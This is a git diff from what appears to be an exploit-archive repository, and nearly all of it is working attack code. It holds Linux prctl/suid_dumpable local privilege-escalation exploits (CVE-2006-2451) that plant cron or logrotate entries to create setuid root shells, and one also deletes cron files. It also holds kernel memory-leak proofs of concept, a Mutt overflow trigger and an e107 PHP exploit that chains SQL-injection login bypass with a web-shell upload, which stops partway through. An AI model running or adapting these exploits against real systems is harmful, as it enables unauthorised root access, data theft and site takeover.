corelimit.rlim_cur = RLIM_INFINITY; - corelimit.rlim_max = RLIM_INFINITY; - setrlimit(RLIMIT_CORE, &corelimit); - - /* let's do the PR_SET_DUMPABLE magic */ - if (!(pid = fork())) { - chdir("/etc/cron.d"); - prctl(PR_SET_DUMPABLE, 2); - sleep(666); - exit(1); - } - kill(pid, SIGSEGV); - - /* did it work? */ - sleep(3); - if (stat("/etc/cron.d/core", &st) < 0) { - fprintf(stderr, "Error: Not vulnerable? See comments.\n"); - exit(1); - } - - fprintf(stderr, "Ready to uncork the champagne? "); - fprintf(stderr, "Please wait a couple of minutes;)\n"); - - /* wait for crond to execute our evil entry */ - for (i = 0; i < 124; i += 2) { - if (stat("/tmp/pwned", &st) < 0) { - fprintf(stderr, "\nError: Check /tmp/pwned!\n"); - exit(1); - } - if (st.st_uid == 0) - break; - fprintf(stderr, "."); - sleep(2); - } - - /* timeout reached? */ - if (i > 120) { - fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n"); - exit(1); - } - - /* total pwnage */ - fprintf(stderr, "CAMPIONI DEL MONDO!\n\n"); - system("/tmp/pwned"); - exit(0); -} - -// milw0rm.com [2006-07-13] +/* + * $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ + * + * raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability + * Copyright (c) 2006 Marco Ivaldi + * + * The suid_dumpable support in Linux kernel 2.6.13 up to versions before + * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial + * of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges + * via the PR_SET_DUMPABLE argument of the prctl function and a program that + * causes a core dump file to be created in a directory for which the user does + * not have permissions (CVE-2006-2451). + * + * Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO! + * CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";)) + * + * Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug. + * + * NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this + * means that distributions that use a different configuration (namely Dillon's + * crontab on Slackware Linux) can be vulnerable but not directly exploitable. + * + * Usage: + * $ gcc raptor_prctl.c -o raptor_prctl -Wall + * [exploit must be dinamically linked] + * $ ./raptor_prctl + * [...] + * sh-3.00# + * + * Vulnerable platforms: + * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] + */ + +#include +#include +#include +#include +#include +#include +#include + +#define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability" +#define INFO2 "Copyright (c) 2006 Marco Ivaldi " + +char payload[] = /* commands to be executed by privileged crond */ +"\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n"; + +char pwnage[] = /* build setuid() helper to circumvent bash checks */ +"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; + +int main(void) +{ + int pid, i; + struct rlimit corelimit; + struct stat st; + + /* print exploit information */ + fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); + + /* prepare the setuid() helper */ + system(pwnage); + + /* set core size to unlimited */ + corelimit.rlim_cur = RLIM_INFINITY; + corelimit.rlim_max = RLIM_INFINITY; + setrlimit(RLIMIT_CORE, &corelimit); + + /* let's do the PR_SET_DUMPABLE magic */ + if (!(pid = fork())) { + chdir("/etc/cron.d"); + prctl(PR_SET_DUMPABLE, 2); + sleep(666); + exit(1); + } + kill(pid, SIGSEGV); + + /* did it work? */ + sleep(3); + if (stat("/etc/cron.d/core", &st) < 0) { + fprintf(stderr, "Error: Not vulnerable? See comments.\n"); + exit(1); + } + + fprintf(stderr, "Ready to uncork the champagne? "); + fprintf(stderr, "Please wait a couple of minutes;)\n"); + + /* wait for crond to execute our evil entry */ + for (i = 0; i < 124; i += 2) { + if (stat("/tmp/pwned", &st) < 0) { + fprintf(stderr, "\nError: Check /tmp/pwned!\n"); + exit(1); + } + if (st.st_uid == 0) + break; + fprintf(stderr, "."); + sleep(2); + } + + /* timeout reached? */ + if (i > 120) { + fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n"); + exit(1); + } + + /* total pwnage */ + fprintf(stderr, "CAMPIONI DEL MONDO!\n\n"); + system("/tmp/pwned"); + exit(0); +} + +// milw0rm.com [2006-07-13] diff --git a/platforms/linux/local/2011.sh b/platforms/linux/local/2011.sh index d5dc64fe6..c6a3a1f53 100755 --- a/platforms/linux/local/2011.sh +++ b/platforms/linux/local/2011.sh @@ -1,64 +1,64 @@ -#!/bin/sh -# -# PRCTL local root exp By: Sunix -# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp -# tested on Intel(R) Xeon(TM) CPU 3.20GHz -# kernel 2.6.9-22.ELsmp -# maybe others ... -# Tx to drayer & RoMaNSoFt for their clear code... -# -# zmia23@yahoo.com - - -cat > /tmp/getsuid.c << __EOF__ -#include -#include -#include -#include -#include -#include -#include -#include - -char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; - -int main() { - int child; - struct rlimit corelimit; - corelimit.rlim_cur = RLIM_INFINITY; - corelimit.rlim_max = RLIM_INFINITY; - setrlimit(RLIMIT_CORE, &corelimit); - if ( !( child = fork() )) { - chdir("/etc/cron.d"); - prctl(PR_SET_DUMPABLE, 2); - sleep(200); - exit(1); - } - kill(child, SIGSEGV); - sleep(120); -} -__EOF__ - -cat > /tmp/s.c << __EOF__ -#include -main(void) -{ -setgid(0); -setuid(0); -system("/bin/sh"); -system("rm -rf /tmp/s"); -system("rm -rf /etc/cron.d/*"); -return 0; -} -__EOF__ -echo "wait aprox 4 min to get sh" -cd /tmp -cc -o s s.c -cc -o getsuid getsuid.c -./getsuid -./s -rm -rf getsuid* -rm -rf s.c -rm -rf prctl.sh - -# milw0rm.com [2006-07-14] +#!/bin/sh +# +# PRCTL local root exp By: Sunix +# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp +# tested on Intel(R) Xeon(TM) CPU 3.20GHz +# kernel 2.6.9-22.ELsmp +# maybe others ... +# Tx to drayer & RoMaNSoFt for their clear code... +# +# zmia23@yahoo.com + + +cat > /tmp/getsuid.c << __EOF__ +#include +#include +#include +#include +#include +#include +#include +#include + +char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; + +int main() { + int child; + struct rlimit corelimit; + corelimit.rlim_cur = RLIM_INFINITY; + corelimit.rlim_max = RLIM_INFINITY; + setrlimit(RLIMIT_CORE, &corelimit); + if ( !( child = fork() )) { + chdir("/etc/cron.d"); + prctl(PR_SET_DUMPABLE, 2); + sleep(200); + exit(1); + } + kill(child, SIGSEGV); + sleep(120); +} +__EOF__ + +cat > /tmp/s.c << __EOF__ +#include +main(void) +{ +setgid(0); +setuid(0); +system("/bin/sh"); +system("rm -rf /tmp/s"); +system("rm -rf /etc/cron.d/*"); +return 0; +} +__EOF__ +echo "wait aprox 4 min to get sh" +cd /tmp +cc -o s s.c +cc -o getsuid getsuid.c +./getsuid +./s +rm -rf getsuid* +rm -rf s.c +rm -rf prctl.sh + +# milw0rm.com [2006-07-14] diff --git a/platforms/linux/local/2031.c b/platforms/linux/local/2031.c index 671a15f34..dbaf9f171 100755 --- a/platforms/linux/local/2031.c +++ b/platforms/linux/local/2031.c @@ -1,108 +1,108 @@ -/* - * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ - * - * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate) - * Copyright (c) 2006 Marco Ivaldi - * - * The suid_dumpable support in Linux kernel 2.6.13 up to versions before - * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial - * of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via - * the PR_SET_DUMPABLE argument of the prctl function and a program that causes - * a core dump file to be created in a directory for which the user does not - * have permissions (CVE-2006-2451). - * - * This exploit uses the logrotate attack vector: of course, you must be able - * to chdir() into the /etc/logrotate.d directory in order to exploit the - * vulnerability. I've experimented a bit with other attack vectors as well, - * with no luck: at (/var/spool/atjobs/) uses file name information to - * establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x - * permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled - * coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c). - * - * Thanks to Solar Designer for the interesting discussion on attack vectors. - * - * NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!! - * - * Usage: - * $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall - * [exploit must be statically linked] - * $ ./raptor_prctl2 - * [please wait until logrotate is run] - * $ ls -l /tmp/pwned - * -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned - * $ /tmp/pwned - * sh-3.00# id - * uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users) - * sh-3.00# - * [don't forget to delete /tmp/pwned!] - * - * Vulnerable platforms: - * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] - */ - -#include -#include -#include -#include -#include -#include -#include - -#define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)" -#define INFO2 "Copyright (c) 2006 Marco Ivaldi " - -char payload[] = /* commands to be executed by privileged logrotate */ -"\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n"; - -char pwnage[] = /* build setuid() helper to circumvent bash checks */ -"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; - -int main(void) -{ - int pid; - struct rlimit corelimit; - struct stat st; - - /* print exploit information */ - fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); - - /* prepare the setuid() helper */ - system(pwnage); - - /* set core size to unlimited */ - corelimit.rlim_cur = RLIM_INFINITY; - corelimit.rlim_max = RLIM_INFINITY; - setrlimit(RLIMIT_CORE, &corelimit); - - /* let's create a fake logfile in /var/log */ - if (!(pid = fork())) { - chdir("/var/log"); - prctl(PR_SET_DUMPABLE, 2); - sleep(666); - exit(1); - } - kill(pid, SIGSEGV); - - /* let's do the PR_SET_DUMPABLE magic */ - if (!(pid = fork())) { - chdir("/etc/logrotate.d"); - prctl(PR_SET_DUMPABLE, 2); - sleep(666); - exit(1); - } - kill(pid, SIGSEGV); - - /* did it work? */ - sleep(3); - if ((stat("/var/log/core", &st) < 0) || - (stat("/etc/logrotate.d/core", &st) < 0)) { - fprintf(stderr, "Error: Not vulnerable? See comments.\n"); - exit(1); - } - - /* total pwnage */ - fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n"); - exit(0); -} - -// milw0rm.com [2006-07-18] +/* + * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ + * + * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate) + * Copyright (c) 2006 Marco Ivaldi + * + * The suid_dumpable support in Linux kernel 2.6.13 up to versions before + * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial + * of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via + * the PR_SET_DUMPABLE argument of the prctl function and a program that causes + * a core dump file to be created in a directory for which the user does not + * have permissions (CVE-2006-2451). + * + * This exploit uses the logrotate attack vector: of course, you must be able + * to chdir() into the /etc/logrotate.d directory in order to exploit the + * vulnerability. I've experimented a bit with other attack vectors as well, + * with no luck: at (/var/spool/atjobs/) uses file name information to + * establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x + * permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled + * coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c). + * + * Thanks to Solar Designer for the interesting discussion on attack vectors. + * + * NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!! + * + * Usage: + * $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall + * [exploit must be statically linked] + * $ ./raptor_prctl2 + * [please wait until logrotate is run] + * $ ls -l /tmp/pwned + * -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned + * $ /tmp/pwned + * sh-3.00# id + * uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users) + * sh-3.00# + * [don't forget to delete /tmp/pwned!] + * + * Vulnerable platforms: + * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] + */ + +#include +#include +#include +#include +#include +#include +#include + +#define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)" +#define INFO2 "Copyright (c) 2006 Marco Ivaldi " + +char payload[] = /* commands to be executed by privileged logrotate */ +"\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n"; + +char pwnage[] = /* build setuid() helper to circumvent bash checks */ +"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; + +int main(void) +{ + int pid; + struct rlimit corelimit; + struct stat st; + + /* print exploit information */ + fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); + + /* prepare the setuid() helper */ + system(pwnage); + + /* set core size to unlimited */ + corelimit.rlim_cur = RLIM_INFINITY; + corelimit.rlim_max = RLIM_INFINITY; + setrlimit(RLIMIT_CORE, &corelimit); + + /* let's create a fake logfile in /var/log */ + if (!(pid = fork())) { + chdir("/var/log"); + prctl(PR_SET_DUMPABLE, 2); + sleep(666); + exit(1); + } + kill(pid, SIGSEGV); + + /* let's do the PR_SET_DUMPABLE magic */ + if (!(pid = fork())) { + chdir("/etc/logrotate.d"); + prctl(PR_SET_DUMPABLE, 2); + sleep(666); + exit(1); + } + kill(pid, SIGSEGV); + + /* did it work? */ + sleep(3); + if ((stat("/var/log/core", &st) < 0) || + (stat("/etc/logrotate.d/core", &st) < 0)) { + fprintf(stderr, "Error: Not vulnerable? See comments.\n"); + exit(1); + } + + /* total pwnage */ + fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n"); + exit(0); +} + +// milw0rm.com [2006-07-18] diff --git a/platforms/linux/local/216.c b/platforms/linux/local/216.c index 6f862cc9b..29b7c113b 100755 --- a/platforms/linux/local/216.c +++ b/platforms/linux/local/216.c @@ -143,6 +143,6 @@ int main( int argc, char * argv[] ) execve( execve_argv[0], execve_argv, NULL ); return( -1 ); } - - -// milw0rm.com [2000-12-02] + + +// milw0rm.com [2000-12-02] diff --git a/platforms/linux/local/252.pl b/platforms/linux/local/252.pl index 43e0e751e..b6a3b8964 100755 --- a/platforms/linux/local/252.pl +++ b/platforms/linux/local/252.pl @@ -64,6 +64,6 @@ $buffer .= $shellcode; # then: export DISPLAY=your-ip:0.0 - and execute the exploit. exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\""); - - -# milw0rm.com [2001-01-15] + + +# milw0rm.com [2001-01-15] diff --git a/platforms/linux/local/258.sh b/platforms/linux/local/258.sh index 97b124bff..96e803625 100755 --- a/platforms/linux/local/258.sh +++ b/platforms/linux/local/258.sh @@ -27,6 +27,6 @@ echo "[*] krochos@linuxmail.org" sleep 1 echo "[*] export RESOLV_HOST_CONF=/etc/shadow" ssh lt 2>/tmp/.resolv -cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} ' - -# milw0rm.com [2001-01-25] +cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} ' + +# milw0rm.com [2001-01-25] diff --git a/platforms/linux/local/30093.txt b/platforms/linux/local/30093.txt new file mode 100755 index 000000000..2858720dd --- /dev/null +++ b/platforms/linux/local/30093.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/24192/info + +Mutt is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation. + +An attacker can exploit this issue to execute arbitrary code with the with the privileges of the victim. Failed exploit attempts will result in a denial of service. + +# USERNAME=$(perl -e 'print "a" x 31') +# useradd -c '&&&&&&&&& your-favourite-ascii-shellcode-here' $USERNAME +# echo alias billg $USERNAME >~/.muttrc +# mutt billg +# Segmentation fault (core dumped) \ No newline at end of file diff --git a/platforms/linux/local/3595.c b/platforms/linux/local/3595.c index 52ecbdafa..a6b83cdbf 100755 --- a/platforms/linux/local/3595.c +++ b/platforms/linux/local/3595.c @@ -1,39 +1,39 @@ -#include -#include -#include -#include -#include -#include -#include - -#define BUFSIZE 0x10000000 - -int main(int argc, char *argv[]) -{ - void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, - MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); - if (mem == (void*)-1) { - printf("Alloc failed\n"); - return -1; - } - /* SOCK_DCCP, IPPROTO_DCCP */ - int s = socket(PF_INET, 6, 33); - if (s == -1) { - fprintf(stderr, "socket failure!\n"); - return 1; - } - /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ - int len = BUFSIZE; - int x = getsockopt(s, 269, 11, mem, &len); - - if (x == -1) - perror("SETSOCKOPT"); - else - printf("SUCCESS\n"); - - write(1, mem, BUFSIZE); - - return 0; -} - -// milw0rm.com [2007-03-28] +#include +#include +#include +#include +#include +#include +#include + +#define BUFSIZE 0x10000000 + +int main(int argc, char *argv[]) +{ + void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, + MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); + if (mem == (void*)-1) { + printf("Alloc failed\n"); + return -1; + } + /* SOCK_DCCP, IPPROTO_DCCP */ + int s = socket(PF_INET, 6, 33); + if (s == -1) { + fprintf(stderr, "socket failure!\n"); + return 1; + } + /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ + int len = BUFSIZE; + int x = getsockopt(s, 269, 11, mem, &len); + + if (x == -1) + perror("SETSOCKOPT"); + else + printf("SUCCESS\n"); + + write(1, mem, BUFSIZE); + + return 0; +} + +// milw0rm.com [2007-03-28] diff --git a/platforms/linux/local/4172.c b/platforms/linux/local/4172.c index 155182f25..c3245db2e 100755 --- a/platforms/linux/local/4172.c +++ b/platforms/linux/local/4172.c @@ -1,84 +1,84 @@ -/* - * Linux Kernel IPV6_Getsockopt_Sticky Memory Leak Proof Of Concept - * dreyer 07-2007 - * Osu, Tatakae, Sexy Pandas! - * - * Dumps to stdout the memory mapped between INI and END. - * - * CVE: CVE-2007-1000 BID: 22904 - * - * Affected: Linux Kernel < 2.6.20.2 - * - * http://bugzilla.kernel.org/show_bug.cgi?id=8134 - * - * Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html - * - * For free!!! ( worth 600 EUR in zerobay! ) - * - */ - - -#include -#include -#include -#include -#include - -#define HOPOPT_OFFSET 8 -#define INIADDR 0xc0100000 -#define ENDADDR 0xd0000000 -unsigned int i; - - -int main(int argc, char *argv[]) { - int s; - unsigned int optlen; - void *ptr; - char value[10240]; - char text[12]; - - fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n" - "dreyer '07 - free feels better\n" - "Dumping %p - %p to stdout\n",INIADDR,ENDADDR); - - s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); - - /* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */ - setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0); - - /* Make 0x00000000 address valid */ - ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); - - if (ptr != NULL) { - perror("mmap"); - exit(-1); - } - - memset(ptr,0,4096); - - /* Make ptr point to np->opt->hopopt = (0x00000000)->hopopt = - * 0x00000000 + 8 */ - ptr=(char *)((char *)ptr+HOPOPT_OFFSET); - - i=INIADDR; - while(i0) { - sprintf(text,"\n%08x:",i); - write(1,text,strlen(text)); - write(1,value,optlen); - i=i+optlen; - } else { - /* We could not read this portion because of some error, skip it */ - i=i+4; - } - } - - return 0; -} - -// milw0rm.com [2007-07-10] +/* + * Linux Kernel IPV6_Getsockopt_Sticky Memory Leak Proof Of Concept + * dreyer 07-2007 + * Osu, Tatakae, Sexy Pandas! + * + * Dumps to stdout the memory mapped between INI and END. + * + * CVE: CVE-2007-1000 BID: 22904 + * + * Affected: Linux Kernel < 2.6.20.2 + * + * http://bugzilla.kernel.org/show_bug.cgi?id=8134 + * + * Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html + * + * For free!!! ( worth 600 EUR in zerobay! ) + * + */ + + +#include +#include +#include +#include +#include + +#define HOPOPT_OFFSET 8 +#define INIADDR 0xc0100000 +#define ENDADDR 0xd0000000 +unsigned int i; + + +int main(int argc, char *argv[]) { + int s; + unsigned int optlen; + void *ptr; + char value[10240]; + char text[12]; + + fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n" + "dreyer '07 - free feels better\n" + "Dumping %p - %p to stdout\n",INIADDR,ENDADDR); + + s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); + + /* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */ + setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0); + + /* Make 0x00000000 address valid */ + ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); + + if (ptr != NULL) { + perror("mmap"); + exit(-1); + } + + memset(ptr,0,4096); + + /* Make ptr point to np->opt->hopopt = (0x00000000)->hopopt = + * 0x00000000 + 8 */ + ptr=(char *)((char *)ptr+HOPOPT_OFFSET); + + i=INIADDR; + while(i0) { + sprintf(text,"\n%08x:",i); + write(1,text,strlen(text)); + write(1,value,optlen); + i=i+optlen; + } else { + /* We could not read this portion because of some error, skip it */ + i=i+4; + } + } + + return 0; +} + +// milw0rm.com [2007-07-10] diff --git a/platforms/linux/remote/1258.php b/platforms/linux/remote/1258.php index efef692de..4916d288c 100755 --- a/platforms/linux/remote/1258.php +++ b/platforms/linux/remote/1258.php @@ -1,261 +1,261 @@ -e107 0.617 remote commands execution

-e107 0.617 resetcore.php SQL injection & remote commands execution

- a script byrgod at http://rgod.altervista.org

-

hostname (ex: www.sitename.com) -

path (ex: /e1 -07/ or just /)

-specify a port other than 80 (default value)

a shell command, cat ./../../e107_config. -php to see database username/password

send exploit through an HTTP proxy (ip:port) -

'; - -function show($headeri) -{ -$ii=0; -$ji=0; -$ki=0; -$ci=0; -echo ''; -while ($ii <= strlen($headeri)-1) -{ -$datai=dechex(ord($headeri[$ii])); -if ($ji==16) { - $ji=0; - $ci++; - echo ""; - for ($li=0; $li<=15; $li++) - { echo ""; - } - $ki=$ki+16; - echo ""; - } -if (strlen($datai)==1) {echo "";} else -{echo " ";} -$ii++; -$ji++; -} -for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) - { echo ""; - } - -for ($li=$ci*16; $li<=strlen($headeri); $li++) - { echo ""; - } -echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; -} - - -function sendpacket($packet) -{ -global $proxy, $host, $port, $html; -if ($proxy=='') - {$ock=fsockopen(gethostbyname($host),$port);} - else - { - $proxy=trim($proxy); - $parts=explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { echo 'No response from proxy...'; - die; - } - } -fputs($ock,$packet); -if ($proxy=='') - { - - $html=''; - while (!feof($ock)) - { - $html.=fgets($ock); - } - } -else - { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) - { - $html.=fread($ock,1); - } - } -fclose($ock); -echo nl2br(htmlentities($html)); -} - - -if (($path<>'') and ($host<>'') and ($command<>'')) -{ - -$port=intval($port); -if (($port=='') or ($port<=0)) {$port=80;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -echo 'Initiating exploit against '.htmlentities($host).':'.htmlentities($port); - -#STEP 1 -> SQL INJECTION in resetcore.php, bypass login and change upload settings -$data.="sitename=e107+powered+website&siteurl=".urlencode('http://'.$host.':'.$port.$path)." -&sitebutton=button.png&sitetag=e107+website+system&sitedescription=&siteadmin=suntzu -&siteadminemail=fakefakefake@suntzu.com&sitetheme=e107v4a&admintheme=e107v4a -&sitedisclaimer=All+trademarks+are+%A9+their+respective+owners%2C+all+other+content+ -is+%A9+e107+powered+website.%3Cbr+%2F%3Ee107+is+%A9+e107.org+2002%2F2003+and+is+released+under+the+% -3Ca+href%3D%27http%3A%2F%2Fwww.gnu.org%2F%27%3EGNU+GPL+license%3C%2Fa%3E. -&newsposts=10&flood_protect=1&flood_timeout=5&flood_time=30&flood_hits=100&anon_post=1 -&user_reg=1&use_coppa=1&profanity_filter=1&profanity_replace=%5Bcensored%5D&chatbox_posts=10& -smiley_activate=&log_activate=&log_refertype=1&longdate=%25A+%25d+%25B+%25Y+-+%25H%3A%25M%3A%25S& -shortdate=%25d+%25b+%3A+%25H%3A%25M&forumdate=%25a+%25b+%25d+%25Y%2C+%25I%3A%25M%25p&sitelanguage= -English&maintainance_flag=0&time_offset=0&cb_linkc=+-link-+&cb_wordwrap=20&cb_linkreplace=1& -log_lvcount=10&meta_tag=&user_reg_veri=1&email_notify=0&forum_poll=0&forum_popular=10&forum_track=0& -forum_eprefix=%5Bforum%5D&forum_enclose=1&forum_title=Forums&forum_postspage=10&user_tracking=cookie& -cookie_name=e107cookie&resize_method=gd2&im_path=%2Fusr%2FX11R6%2Fbin%2Fconvert&im_quality=80& -im_width=120&im_height=100&upload_enabled=1&upload_allowedfiletype=.php& -upload_storagetype=2&upload_maxfilesize=&upload_class=254&cachestatus=&displayrendertime=1& -displaysql=&displaythemeinfo=1&link_submit=1&link_submit_class=0&timezone=GMT&search_restrict=1& -antiflood1=1&antiflood_timeout=10&autoban=1&coreedit_sub=Save+Core+Settings&a_name="; -$data.=urlencode("'or isnull(1/0)/*")."&a_password=d41d8cd98f00b204e9800998ecf8427e"; -// ^ ^ -// | | -// here we have login bypass ;) hash of [nothing] -//so, you see, we activate public uploads and .php extensions for attachments -$packet="POST ".$p."e107_files/resetcore.php HTTP/1.1\r\n"; -$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n"; -$packet.="Referer: http://".$host.":".$port.$path."e107_files/resetcore.php\r\n"; -$packet.="Accept-Language: it\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="User-Agent: Matrix S.p.A. - FAST Enterprise Crawler 6 (Unknown admin e-mail address)\r\n"; -$packet.="Host: ".$host.":".$port."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Cache-Control: no-cache\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n"; -$packet.=$data; - -show($packet); -sendpacket($packet); -if (eregi("Core settings successfully updated",$html)) {echo '
Ok... we reset core values...Continue...';} - else {echo '
Exploit failed...'; die;} - -#STEP 2 -> Upload a shell... -$data='------------W1dUnnWzZExD8Rb1Pctwsq -Content-Disposition: form-data; name="file_name" - -baby -------------W1dUnnWzZExD8Rb1Pctwsq -Content-Disposition: form-data; name="file_version" - -666 -------------W1dUnnWzZExD8Rb1Pctwsq -Content-Disposition: form-data; name="file_userfile[]"; filename="c:\suntzu.php" -Content-Type: multipart/form-data - - -------------W1dUnnWzZExD8Rb1Pctwsq -Content-Disposition: form-data; name="file_userfile[]"; filename="" - - -------------W1dUnnWzZExD8Rb1Pctwsq -Content-Disposition: form-data; name="file_description" - -mphhh.... -------------W1dUnnWzZExD8Rb1Pctwsq -Content-Disposition: form-data; name="file_website" - - -------------W1dUnnWzZExD8Rb1Pctwsq -Content-Disposition: form-data; name="file_demo" - - -------------W1dUnnWzZExD8Rb1Pctwsq -Content-Disposition: form-data; name="upload" - -Submit and Upload -------------W1dUnnWzZExD8Rb1Pctwsq--'; - -$packet="POST ".$p."upload.php HTTP/1.1\r\n"; -$packet.="User-Agent: Nokia7110/1.0 (05.01) (Google WAP Proxy/1.0)\r\n"; -$packet.="Host: ".$host.":".$port."\r\n"; -$packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"; -$packet.="Accept-Language: it,en;q=0.9\r\n"; -$packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; -$packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; -$packet.="Referer: 